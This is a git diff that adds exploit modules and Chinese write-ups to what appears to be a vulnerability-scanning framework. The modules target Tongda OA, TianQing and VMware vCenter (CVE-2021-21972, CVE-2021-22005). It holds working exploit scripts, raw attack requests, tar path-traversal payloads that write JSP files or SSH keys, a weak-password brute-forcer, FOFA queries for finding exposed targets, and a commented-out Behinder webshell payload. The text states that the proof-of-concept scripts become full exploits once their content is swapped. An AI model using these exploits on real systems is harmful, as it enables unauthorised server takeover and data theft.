-0,0 +1,85 @@ +# 1、漏洞描述 + +通达OA部分版本在成功登录系统后,存在任意文件上传漏洞,配合手动设置的上传文件保存路径,可直接getshell。 + +# 2、影响范围 + +V11.2 + +V11.3 + +# 3、漏洞复现 + + + +登陆后,选择菜单-->系统管理员-->附件管理; + +然后配置文件保存路径,若真实环境中已经保存了上传路径,并且上传路径为webroot目录之下的任何一个子目录,则可不用修改,直接用即可。 + +![](images/21.png) + +文件上传位置在,组织-->系统管理员-->上传附件,默认文件上传位置C:\MYOA\attach\im\2108,因为不在web目录下边,所以不能通过web直接访问,可借助文件包含试试; + +![](images/22.png) + +上传文件时抓包,同时利用Windows文件命名特性,后缀加.绕过文件上传黑名单, + +![](images/23.png) + +上传后的目录则在设置的主目录下的im/上传返回的一串数字/文件名,这个2108为im目录的子目录,下划线后边的这串数字则为文件名的一部分,整个文件名在这里是1664170897.21.php,命名规则为返回的这串数字+.+上传的文件名; + +![](images/24.png) + +POST包: + +```python +POST /module/upload/upload.php?module=im HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------405175731128638857693749932995 +Content-Length: 948 +Origin: http://127.0.0.1 +DNT: 1 +Connection: close +Referer: http://127.0.0.1/general/index.php?isIE=0&modify_pwd=0 +Cookie: USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=5197c48a; PHPSESSID=v0vakndetps2s3o506alv3fhc5 + +-----------------------------405175731128638857693749932995 +Content-Disposition: form-data; name="id" + +WU_FILE_0 +-----------------------------405175731128638857693749932995 +Content-Disposition: form-data; name="name" + +21.php +-----------------------------405175731128638857693749932995 +Content-Disposition: form-data; name="type" + +application/octet-stream +-----------------------------405175731128638857693749932995 +Content-Disposition: form-data; name="lastModifiedDate" + +2021/8/30 上午10:41:07 +-----------------------------405175731128638857693749932995 +Content-Disposition: form-data; name="size" + +31 +-----------------------------405175731128638857693749932995 +Content-Disposition: form-data; name="file"; filename="21.php." +Content-Type: application/octet-stream + + +-----------------------------405175731128638857693749932995-- + +``` + +# 4、poc + +poc这里只验证是否能上传上去,没有考虑上传后的目录问题,不过只要能上传上去,上传后的目录也就能知道,上边也有写。 + +poc这里调用了通达OA的另外两个漏洞,任意在线用户登录、任意用户登录,为了方便能够在只知道url的情况下,直接验证,配合框架,可以批量。 \ No newline at end of file diff --git a/Moudle/TDXK/TDXK_logined_any_file_upload.py b/Moudle/TDXK/TDXK_logined_any_file_upload.py new file mode 100644 index 0000000..338ab10 --- /dev/null +++ b/Moudle/TDXK/TDXK_logined_any_file_upload.py @@ -0,0 +1,114 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import re +import requests.packages.urllib3 +import io +from Config.config_requests import ua +from Moudle.TDXK.TDXK_Any_user_login import poc as poc1 +from Moudle.TDXK.TDXK_online_user_login import poc as poc2 +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + +# 脚本信息 +###################################################### +NAME='TDXK_logined any file upload' +AUTHOR="境心" +REMARK='TDXK_登录后任意文件上传' +FOFA_RULE='app="TDXK-通达OA"' +###################################################### + +def poc_content(): + content = """-----------------------------340010984629733334144172362322 +Content-Disposition: form-data; name="id" + +WU_FILE_0 +-----------------------------340010984629733334144172362322 +Content-Disposition: form-data; name="name" + +test.php +-----------------------------340010984629733334144172362322 +Content-Disposition: form-data; name="type" + +application/octet-stream +-----------------------------340010984629733334144172362322 +Content-Disposition: form-data; name="lastModifiedDate" + +2021/8/25 下午2:58:14 +-----------------------------340010984629733334144172362322 +Content-Disposition: form-data; name="size" + +31 +-----------------------------340010984629733334144172362322 +Content-Disposition: form-data; name="file"; filename="test.php." +Content-Type: application/octet-stream + + +-----------------------------340010984629733334144172362322--""" + mem_string = io.StringIO() + mem_string.write(content) + mem_string.seek(0) + return mem_string + +def get_cookie(target): + result1 = poc1(target) + if result1['cookie']: + cookie = result1['cookie'] + else: + result2 = poc2(target) + if result2['cookie']: + cookie = result2['cookie'] + return cookie + + +def poc(target,cookie=None): + result = {} + mem_string = poc_content() + upload_url = target+"/module/upload/upload.php?module=im" + target_tmp_file = [('file', ('test.php', mem_string.read(), 'image/jpeg'))] + if cookie != None: + cookie = cookie + headers = { + "User-Agent": ua, + "Accept-Encoding": "gzip, deflate", + "Content-Type": "multipart/form-data; boundary=---------------------------340010984629733334144172362322", + "Cookie": cookie, + "Connection": "close" + } + target_res = requests.post(upload_url, headers=headers, files=target_tmp_file, verify=False, timeout=5) + res_text = target_res.text + if "test.php" in res_text and "SUCCESS" in res_text: + target_tmp_path = re.findall('@(\d+)_', str(res_text))[0] + target_tmp_filename = re.findall('@\d+_(\d+)', str(res_text))[0] + target_filename = target_tmp_filename + '.test.php' + print("文件位置: 未知上层目录/im/" + target_tmp_path + "/"+target_filename) + elif cookie == None: + cookie = get_cookie(target) + headers = { + "User-Agent": ua, + "Accept-Encoding": "gzip, deflate", + "Content-Type": "multipart/form-data; boundary=---------------------------340010984629733334144172362322", + "Cookie": cookie, + "Connection": "close" + } + target_res = requests.post(upload_url, headers=headers, files=target_tmp_file, verify=False, timeout=5) + res_text = target_res.text + if "test.php" in res_text and "SUCCESS" in res_text: + target_tmp_path = re.findall('@(\d+)_', str(res_text))[0] + target_tmp_filename = re.findall('@\d+_(\d+)', str(res_text))[0] + target_filename = target_tmp_filename+'.test.php' + result['文件位置'] = "未知上层目录/im/"+target_tmp_path+"/"+target_filename + result['poc'] = NAME + result['message'] = '存在登录后任意文件上传漏洞' + return result + +if __name__ == '__main__': + # 结合任意登录漏洞盲测 + poc("http://127.0.0.1") + # 盲测无结果,但能获取到账号的情况下,精准测试 + # poc("http://127.0.0.1","PHPSESSID=tbd8hi89eqtbeadt29rmort167; path=/") \ No newline at end of file diff --git a/Moudle/TDXK/TDXK_online_user_login.md b/Moudle/TDXK/TDXK_online_user_login.md new file mode 100644 index 0000000..5bad6f1 --- /dev/null +++ b/Moudle/TDXK/TDXK_online_user_login.md @@ -0,0 +1,49 @@ +# 1、写在前方 +漏洞利用虽然不复杂,但是因为条件限制,有点看脸的赶脚,fofa上第二页才找到一个可利用的,所以吧。。。 +# 2、漏洞描述 +通达OA V11.7版本存在任意在线用户登录漏洞,只需账号是已登录状态,其他访问者无需账号、密码即可登录该账号。 +使用fofa语句搜索该版本的通达OA + +``` +app="TDXK-通达OA" +``` + + + +# 3、漏洞验证 +## 3.1、漏洞URL +访问如下URL(重点是URI部分,尤其是uid),更改遍历uid的值(数字),即可实现任意在线用户登录。 + +``` +http://x.x.x.x:port/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 +``` + + + +## 3.2、漏洞验证 +页面返回为空白,则证明可利用 + +![](images/31.png) + +页面返回RELOGIN,则不能利用 + +![](images/32.jpg) + +若漏洞可利用,则我们已经获取到了登录的cookie + +![](images/33.jpg) + +# 4、漏洞利用 +此时我们将URL改为如下内容(其实改的URI部分),然后访问,发现就已经成功登录了。 + +``` +http://x.x.x.x:port/general/ +``` + +![](images/34.jpg) + + + +# 5、脚本 +这个漏洞poc与exp差不多,脚本会返回漏洞URL、可直接登录的cookie,与框架结合可批量。 + diff --git a/Moudle/TDXK/TDXK_online_user_login.py b/Moudle/TDXK/TDXK_online_user_login.py new file mode 100644 index 0000000..26c3e23 --- /dev/null +++ b/Moudle/TDXK/TDXK_online_user_login.py @@ -0,0 +1,37 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import requests.packages.urllib3 +from Config.config_requests import headers +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + +# 脚本信息 +###################################################### +NAME='TDXK_online user login' +AUTHOR="境心" +REMARK='TDXK_任意在线用户登录' +FOFA_RULE='app="TDXK-通达OA"' +###################################################### + +def poc(target): + result = {} + vul_url = target+"/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0" + + res = requests.get(vul_url, headers=headers, verify=False,timeout=5) + if res.status_code == 200 and res.text == "RELOGIN": + pass + elif res.status_code == 200 and res.text == "": + res_headers = res.headers + cookie = res_headers['Set-Cookie'] + result['vul_url'] = vul_url + result['cookie'] = cookie + result['poc'] = NAME + result['message'] = "存在任意在线用户登录漏洞" + return result + +if __name__ == '__main__': + poc("http://127.0.0.1:8088/") diff --git a/Moudle/TDXK/TDXK_weakpwd.py b/Moudle/TDXK/TDXK_weakpwd.py new file mode 100644 index 0000000..495ead9 --- /dev/null +++ b/Moudle/TDXK/TDXK_weakpwd.py @@ -0,0 +1,46 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import base64 +import requests +import requests.packages.urllib3 +from Config.config_requests import headers +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + +# 脚本信息 +###################################################### +NAME='TDXK_weakpwd' +AUTHOR="nuoyan" +REMARK='TDXK_弱口令' +FOFA_RULE='app="TDXK-通达OA"' +###################################################### + +def poc(target): + result = {} + vul_url = target+"/logincheck.php" + + dic=['','123456','admin','123456789','1','123','111111'] + for i in dic: + postdata = { + 'UNAME': 'admin', + 'PASSWORD': base64.b64encode(i.encode()).decode(), + 'encode_type': '1', + } + + res = requests.post(vul_url, headers=headers,data=postdata, verify=False,timeout=10) + if 'goto_oa' in res.text: + result['target'] = target + result['poc'] = NAME + result['message'] = "存在admin弱口令:{}".format(i) + return result + pass + else: + pass + +if __name__ == '__main__': + poc("http://127.0.0.1:8088/") + + diff --git a/Moudle/TDXK/images/1.png b/Moudle/TDXK/images/1.png new file mode 100644 index 0000000..d80720d Binary files /dev/null and b/Moudle/TDXK/images/1.png differ diff --git a/Moudle/TDXK/images/11.png b/Moudle/TDXK/images/11.png new file mode 100644 index 0000000..8329f2d Binary files /dev/null and b/Moudle/TDXK/images/11.png differ diff --git a/Moudle/TDXK/images/12.png b/Moudle/TDXK/images/12.png new file mode 100644 index 0000000..7417271 Binary files /dev/null and b/Moudle/TDXK/images/12.png differ diff --git a/Moudle/TDXK/images/13.png b/Moudle/TDXK/images/13.png new file mode 100644 index 0000000..92318e3 Binary files /dev/null and b/Moudle/TDXK/images/13.png differ diff --git a/Moudle/TDXK/images/14.png b/Moudle/TDXK/images/14.png new file mode 100644 index 0000000..7e0f9f7 Binary files /dev/null and b/Moudle/TDXK/images/14.png differ diff --git a/Moudle/TDXK/images/15.png b/Moudle/TDXK/images/15.png new file mode 100644 index 0000000..ce759d6 Binary files /dev/null and b/Moudle/TDXK/images/15.png differ diff --git a/Moudle/TDXK/images/16.png b/Moudle/TDXK/images/16.png new file mode 100644 index 0000000..a9a3711 Binary files /dev/null and b/Moudle/TDXK/images/16.png differ diff --git a/Moudle/TDXK/images/2.png b/Moudle/TDXK/images/2.png new file mode 100644 index 0000000..fd818de Binary files /dev/null and b/Moudle/TDXK/images/2.png differ diff --git a/Moudle/TDXK/images/21.png b/Moudle/TDXK/images/21.png new file mode 100644 index 0000000..b9d382e Binary files /dev/null and b/Moudle/TDXK/images/21.png differ diff --git a/Moudle/TDXK/images/22.png b/Moudle/TDXK/images/22.png new file mode 100644 index 0000000..c603b7b Binary files /dev/null and b/Moudle/TDXK/images/22.png differ diff --git a/Moudle/TDXK/images/23.png b/Moudle/TDXK/images/23.png new file mode 100644 index 0000000..dd1e24b Binary files /dev/null and b/Moudle/TDXK/images/23.png differ diff --git a/Moudle/TDXK/images/24.png b/Moudle/TDXK/images/24.png new file mode 100644 index 0000000..3518a31 Binary files /dev/null and b/Moudle/TDXK/images/24.png differ diff --git a/Moudle/TDXK/images/3.png b/Moudle/TDXK/images/3.png new file mode 100644 index 0000000..1bbaea7 Binary files /dev/null and b/Moudle/TDXK/images/3.png differ diff --git a/Moudle/TDXK/images/31.png b/Moudle/TDXK/images/31.png new file mode 100644 index 0000000..aa98c58 Binary files /dev/null and b/Moudle/TDXK/images/31.png differ diff --git a/Moudle/TDXK/images/32.jpg b/Moudle/TDXK/images/32.jpg new file mode 100644 index 0000000..4e889cf Binary files /dev/null and b/Moudle/TDXK/images/32.jpg differ diff --git a/Moudle/TDXK/images/33.jpg b/Moudle/TDXK/images/33.jpg new file mode 100644 index 0000000..fe354b3 Binary files /dev/null and b/Moudle/TDXK/images/33.jpg differ diff --git a/Moudle/TDXK/images/34.jpg b/Moudle/TDXK/images/34.jpg new file mode 100644 index 0000000..fca0fc0 Binary files /dev/null and b/Moudle/TDXK/images/34.jpg differ diff --git a/Moudle/TDXK/images/4.png b/Moudle/TDXK/images/4.png new file mode 100644 index 0000000..2daa7e6 Binary files /dev/null and b/Moudle/TDXK/images/4.png differ diff --git a/Moudle/TDXK/images/5.png b/Moudle/TDXK/images/5.png new file mode 100644 index 0000000..b72b879 Binary files /dev/null and b/Moudle/TDXK/images/5.png differ diff --git a/Moudle/TDXK/images/6.png b/Moudle/TDXK/images/6.png new file mode 100644 index 0000000..fe3ac4b Binary files /dev/null and b/Moudle/TDXK/images/6.png differ diff --git a/Moudle/TDXK/images/7.png b/Moudle/TDXK/images/7.png new file mode 100644 index 0000000..0ca37b9 Binary files /dev/null and b/Moudle/TDXK/images/7.png differ diff --git a/Moudle/TianQing/TianQing_SQLinjection.py b/Moudle/TianQing/TianQing_SQLinjection.py new file mode 100644 index 0000000..8092fa1 --- /dev/null +++ b/Moudle/TianQing/TianQing_SQLinjection.py @@ -0,0 +1,32 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests + +requests.packages.urllib3.disable_warnings() + +# 脚本信息 +###################################################### +NAME='TianQing_SQLinjection' +AUTHOR="JDQ" +REMARK='天擎终端安全管理系统SQL注入' +FOFA_RULE='icon_hash="-829652342"' +###################################################### + +def poc(target): + result = {} + headers={ + "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" + } + + try: + r = requests.get(target+"/api/dp/rptsvcsyncpoint?ccid=1",headers=headers, verify=False,timeout=10) + if r.status_code==200 and 'result":0,"reason":"success' in r.text: + result['vurl'] = target + "/api/dp/rptsvcsyncpoint?ccid=1" + result['poc'] = NAME + return result + except: + pass + +if __name__ == '__main__': + poc("http://127.0.0.1") \ No newline at end of file diff --git a/Moudle/TianQing/TianQing_Unauthorized.py b/Moudle/TianQing/TianQing_Unauthorized.py new file mode 100644 index 0000000..b7af80a --- /dev/null +++ b/Moudle/TianQing/TianQing_Unauthorized.py @@ -0,0 +1,35 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests + +requests.packages.urllib3.disable_warnings() + +# 脚本信息 +###################################################### +NAME='TianQing_Unauthorized' +AUTHOR="JDQ" +REMARK='天擎终端安全管理系统未授权访问' +FOFA_RULE='icon_hash="-829652342"' +###################################################### + +def poc(target): + result = {} + headers={ + "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" + } + + try: + r = requests.get(target+"/api/dbstat/gettablessize",headers=headers, verify=False,timeout=10) + + if r.status_code==200 and 'result":0,"reason":"success' in r.text: + result['vurl'] = target + "/api/dbstat/gettablessize" + result['poc'] = NAME + return result + + except: + pass + + +if __name__ == '__main__': + poc("http://127.0.0.1") \ No newline at end of file diff --git a/Moudle/VCenter/1.png b/Moudle/VCenter/1.png new file mode 100644 index 0000000..cd7a704 Binary files /dev/null and b/Moudle/VCenter/1.png differ diff --git a/Moudle/VCenter/CVE_2021_21972.md b/Moudle/VCenter/CVE_2021_21972.md new file mode 100644 index 0000000..32f2fd6 --- /dev/null +++ b/Moudle/VCenter/CVE_2021_21972.md @@ -0,0 +1,111 @@ +# 1、漏洞描述 + +vSphere Client(HTML5) 在 vCenter Server 插件中存在一个未授权的上传API接口。未授权的攻击者可以通过开放 443 端口的服务器向 vCenter Server 发送精心构造的请求,写入webshell,或向Linux系统的指定目录写入ssh 私钥,进而控制服务器。 + +fofa搜索方法见poc。 + +# 2、影响范围 + +vmware:vcenter_server 7.0 U1c 之前的 7.0 版本 + +vmware:vcenter_server 6.7 U3l 之前的 6.7 版本 + +vmware:vcenter_server 6.5 U3n 之前的 6.5 版本 + +# 3、漏洞分析 + +漏洞分析内容直接搬网上的,方便之后看漏洞部分代码 + +vCenter Server 的 vROPS 插件的 API 未经过鉴权,存在一些敏感接口。其中 uploadova 接口存在一个上传 OVA 文件的功能: + +```java +@RequestMapping( + value = {"/uploadova"}, + method = {RequestMethod.POST} + ) + public void uploadOvaFile(@RequestParam(value = "uploadFile",required = true) CommonsMultipartFile uploadFile, HttpServletResponse response) throws Exception { + logger.info("Entering uploadOvaFile api"); + int code = uploadFile.isEmpty() ? 400 : 200; + PrintWriter wr = null; +... + response.setStatus(code); + String returnStatus = "SUCCESS"; + if (!uploadFile.isEmpty()) { + try { + logger.info("Downloading OVA file has been started"); + logger.info("Size of the file received : " + uploadFile.getSize()); + InputStream inputStream = uploadFile.getInputStream(); + File dir = new File("/tmp/unicorn_ova_dir"); + if (!dir.exists()) { + dir.mkdirs(); + } else { + String[] entries = dir.list(); + String[] var9 = entries; + int var10 = entries.length; + + for(int var11 = 0; var11 < var10; ++var11) { + String entry = var9[var11]; + File currentFile = new File(dir.getPath(), entry); + currentFile.delete(); + } + + logger.info("Successfully cleaned : /tmp/unicorn_ova_dir"); + } + + TarArchiveInputStream in = new TarArchiveInputStream(inputStream); + TarArchiveEntry entry = in.getNextTarEntry(); + ArrayList result = new ArrayList(); +``` + +代码逻辑是将 TAR 文件解压后上传到`/tmp/unicorn_ova_dir` 目录。注意到如下代码: + +```java +while(entry != null) { + if (entry.isDirectory()) { + entry = in.getNextTarEntry(); + } else { + File curfile = new File("/tmp/unicorn_ova_dir", entry.getName()); + File parent = curfile.getParentFile(); + if (!parent.exists()) { + parent.mkdirs(); +``` + +直接将 TAR 的文件名与`/tmp/unicorn_ova_dir`拼接并写入文件。如果文件名内存在 ../ 即可实现目录遍历 + +**tips:** + +如果是Linux系统,并且开放了ssh端口,可上传Linux的ssh 私钥,直接免密登录系统,创建一个包含`../../home/vsphere-ui/.ssh/authorized_keys`的 TAR 文件并上传后利用 SSH 登陆。 + +# 4、漏洞复现 + +手工复现的时候遇到一个坑,看着POST包都没问题,但是上传总是返回FAILED,最后发现是上传的tar包没对应好操作系统,这里应该是解压的时候,不存在的目录也不会自动创建,导致返回FAILED,所以手工复现的时候要注意。 + +下边POST包中,【上传的TAR包内容】部分内容,不能直接复制,不能更改,要借用本地的文件上传环境抓包,修改URI和HOST。 + +POST包: + +```java +POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1 +Host: x.x.x.x +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 +Content-Type: multipart/form-data; boundary=---------------------------211802199140467231863335463058 +Content-Length: 2796 +Connection: close + +-----------------------------211802199140467231863335463058 +Content-Disposition: form-data; name="uploadFile"; filename="Linux_t.tar" +Content-Type: application/x-tar + +【上传的TAR包内容】 +-----------------------------211802199140467231863335463058-- +``` + +TAR包中的目录格式,Windows系统的为`../../ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/test.jsp`,Linux系统的为`../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/41/0/h5ngc.war/resources/test.jsp`,至于是poc还是exp更改test.jsp文件内容即可。 + +上传之后poc/exp的位置,Windows系统的为`https://ip:port/statsreport/test.jsp`,Linux系统的为`https://ip:port/ui/resources/test.jsp`。若更改了tar包中的poc/exp的文件名,这里的文件名也相应的改变。 + +# 5、poc + +这里也遇到了两个坑,一是上传的时候不落地文件,想着在内存中生成tar文件,其中用到了tarfile.open,关键是其中的fileobj参数,以及TarInfo和addfile,也是在本地的文件上传环境中不断尝试才成功。二是内存中操作数据的时候,一定要在读取数据的时候使用seek移动读取的位置,默认是数据写到哪,就在哪个位置读取,不用seek的话,一般读到的都是空。 + +poc做了操作系统类型判断,只返回有漏洞的URL和poc URL,方便验证,配合框架可批量,更改content的内容,即可为exp。 \ No newline at end of file diff --git a/Moudle/VCenter/CVE_2021_21972.py b/Moudle/VCenter/CVE_2021_21972.py new file mode 100644 index 0000000..484f0a7 --- /dev/null +++ b/Moudle/VCenter/CVE_2021_21972.py @@ -0,0 +1,85 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import requests.packages.urllib3 +import tarfile +import io +from Config.config_requests import headers +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + +# 脚本信息 +###################################################### +NAME='CVE-2021-21972' +AUTHOR="境心" +REMARK='VCenter6.7及以下版本任意文件上传漏洞' +FOFA_RULE='title="+ ID_VC_Welcome +"' +###################################################### + +# 内存生成poc tar文件 +def content_poc(target): + windows_filename = "../../ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/test.jsp" + linux_filename = "../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/41/0/h5ngc.war/resources/test.jsp" + content = """<%@ page contentType="text/html;charset=UTF-8" language="java" %> +<% out.print("this is a friendly test, Please check and repair upload vulnerabilities."); +%>""" + system_type = ve_system_poc(target) + if system_type is not None: + mem_string = io.BytesIO() + tr_file = tarfile.open(fileobj=mem_string, mode='w') + if system_type == "windows": + info = tarfile.TarInfo(name=windows_filename) + info.size = len(content) + tr_file.addfile(info, io.BytesIO(content.encode('utf-8'))) + tr_file.close() + elif system_type == "linux": + info = tarfile.TarInfo(name=linux_filename) + info.size = len(content) + tr_file.addfile(info, io.BytesIO(content.encode('utf-8'))) + tr_file.close() + return mem_string,system_type + +# 判断系统类型1 +def ve_system(target): + ve_url = target + '/Ui/vropspluginui/rest/services/uploadova' + res1 = requests.get(ve_url, headers=headers, verify=False, timeout=5) + return res1.status_code + +# 判断系统类型2 +def ve_system_poc(target): + vurl = target + '/ui/vropspluginui/rest/services/uploadova' + ve_res = requests.get(vurl, headers=headers, verify=False, timeout=5) + if ve_res.status_code == 405: + if ve_system(target) == ve_res.status_code: + return "windows" + else: + return "linux" + else: + return None + +def poc(target): + result = {} + vurl = target + '/ui/vropspluginui/rest/services/uploadova' + mem_string,system_type = content_poc(target) + # 移动读写位置到最开始 + mem_string.seek(0) + file = [('uploadFile', ('test.tar', mem_string.read(), 'application/x-tar'))] + res = requests.post(vurl, files=file, headers=headers, verify=False, timeout=5) + if "SUCCESS" in res.text: + if system_type == "windows": + poc_url = target + "/statsreport/test.jsp" + elif system_type == "linux": + poc_url = target + "/ui/resources/test.jsp" + res_1 = requests.get(poc_url, headers=headers, verify=False, timeout=5) + if res_1.status_code == 200 and "this is a friendly test" in res_1.text: + result['poc'] = NAME + result['vurl'] = vurl + result['pocurl'] = poc_url + return result + +if __name__ == '__main__': + # poc调用 + poc("http://127.0.0.1") \ No newline at end of file diff --git a/Moudle/VCenter/CVE_2021_22005.md b/Moudle/VCenter/CVE_2021_22005.md new file mode 100644 index 0000000..b7420bc --- /dev/null +++ b/Moudle/VCenter/CVE_2021_22005.md @@ -0,0 +1,114 @@ +# 漏洞简述 + +能够网络访问vCenter Server 上的 443 端口的攻击者可以通过构造上传请求,上传恶意文件,获取服务器权限,在 vCenter Server 上远程执行代码。该漏洞无需经过身份验证即可远程利用,攻击复杂度低,且无需用户交互。 + +# 影响范围 + +VMware vCenter Server 7.0 + +VMware vCenter Server 6.7 + +# 漏洞复现 + +漏洞检测POST包: + +```java +POST /analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?_c=1231231&_i=456456 HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 +X-Deployment-Secret: test +Content-Type: application/json +Content-Length: 252 + +{ "manifestSpec":{},"objectType": "a2","collectionTriggerDataNeeded": "True","deploymentDataNeeded":"True","resultNeeded": "True","signalCollectionCompleted":"True","localManifestPath": "a7", +"localPayloadPath": "a8","localObfuscationMapPath": "a9" } +``` + +返回包状态码为201,证明存在漏洞; + +```java +HTTP/1.1 201 +Content-Length: 0 +Date: Thu, 21 Oct 2021 06:30:07 GMT +Server: Apache +``` + +注: + +- URL中的_c和_i,最好是随机生成,因若多次请求同一个站,这两个参数内容若与之前一样,无论网站是否存在漏洞,返回包状态码均固定为409; +- header头中的X-Deployment-Secret必须要有,Content-Type可以没有,但最好带着; + +- data数据中的True,手工测试的时候,要用双引号引起来在;从脚本到手工复现,这个地方被坑了一会 + + + +漏洞poc/exp的POST包: + +```java +POST /analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?action=collect&_c=1231231&_i=456456 HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 +Content-Type: application/json +X-Deployment-Secret: test +Content-Length: 3590 + + + +{"contextData": "a3", "manifestContent": "\r\n \r\n \r\n \r\n ServiceInstance\r\n \r\n \r\n content.about.instanceUuid\r\n content.about.osType\r\n content.about.build\r\n content.about.version\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n vir:VCenter\r\n \r\n \r\n \r\n ServiceInstance\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n vir:VCenter\r\n \r\n \r\n \r\n ", "objectId": "a2"} +``` + +返回包状态码为200,并且返回如下内容证明上传成功; + +```java +HTTP/1.1 200 +Content-Type: application/json;charset=ISO-8859-1 +Content-Length: 120 +Date: Thu, 21 Oct 2021 06:56:40 GMT +Server: Apache + +{"@type":"collection_completed","collection_completed_timestamp":1634799400166,"@id":"2555d5f7f87941498c4b482b9e3e40a4"} +``` + +要访问的上传文件地址为:(ip、端口、文件名自行替换) + +```java +https://ip:port/idm/..;/test.jsp +``` + +注: + +- 此POST包要在上一步的检测POST包之后使用,并且URL中的_c和_i值,至少要是历史中的上一步请求过的(个人理解这两个参数是一个简单的验证),所以这里最好是随机生成,并且分别赋值给这两步中的两个参数,保证每次都是随机不重复,并且还是一样的; +- X-Deployment-Secret与Content-Type与上一步中一样; + +- 作为文件上传,data数据中大部分内容不用变,只变动$appender.setFile和$logger.warn的内容,前者是更改路径的文件名,(上传后要访问的文件),后者是具体的poc/exp内容; +- 仔细看应该也能看出来,这部分最长的一段json的值,在"前边加了\,因为"冲突了。其中的poc/exp部分做了Unicode编码,并且<、>、"是做了两次Unicode编码的(或者不嫌传输内容过长的话,直接把全部的poc/exp的内容两次Unicode编码也可)。不做两次Unicode编码的话,上传上去的<、>、"会被实体化,导致无法解析; + +- 亲测站长上的Unicode编码不好使,即使两次编码,传上去的文件依然无法解析。 + +附字符串转Unicode编码的脚本(二次及以上编码的话,编码后的内容再次当作字符串编码时,每个\要替换为\\): + +```java +string = """<%@ page contentType="text/html;charset=UTF-8" language="java" %> +<% out.print("this is a friendly test, Please check and repair upload vulnerabilities.");%>""" + +string_unicode = "" +for i in string: + asc_chr = ord(i) + print(i) + aa = "\\u{:04x}".format(asc_chr) + string_unicode = string_unicode + aa + +print(string_unicode) +``` + +顺手记录一下上传后情景: + +![](1.png) + + + +# poc/exp: + +根据需求,自行注释切换poc还是exp,不过在输出上更严的做了poc的判断,没做exp是否成功的判断,建议先使用poc验证,再尝试exp,完事手工验证一下是否被拦截。 + +与手工验证利用不一样的地方,poc、exp部分的内容,只需要做一次Unicode编码即可。 \ No newline at end of file diff --git a/Moudle/VCenter/CVE_2021_22005.py b/Moudle/VCenter/CVE_2021_22005.py new file mode 100644 index 0000000..d864f94 --- /dev/null +++ b/Moudle/VCenter/CVE_2021_22005.py @@ -0,0 +1,136 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import requests.packages.urllib3 +import random +import string +from Config.config_requests import ua +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + +# 脚本信息 +###################################################### +NAME='CVE-2021-22005' +AUTHOR="境心" +REMARK='VMware vCenter Analytics 任意文件上传漏洞' +FOFA_RULE='title="+ ID_VC_Welcome +"' +###################################################### + + +def id_generate(size=6, chars=string.ascii_lowercase + string.digits): + return ''.join(random.choice(chars) for _ in range(size)) + +def poc_content(filename): + file_path = "/usr/lib/vmware-sso/vmware-sts/webapps/ROOT/%s" % (filename) + poc_content_part = """<%@ page contentType="text/html;charset=UTF-8" language="java" %> +<% out.print("this is a friendly test, Please check and repair upload vulnerabilities."); +%>""" + # 冰蝎原始 + # poc_content_part = """<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>""" + poc_content_part_unicode = "" + for i in poc_content_part: + asc_chr = ord(i) + aa = "\\u{:04x}".format(asc_chr) + poc_content_part_unicode = poc_content_part_unicode + aa + + content = """ + + + + ServiceInstance + + + 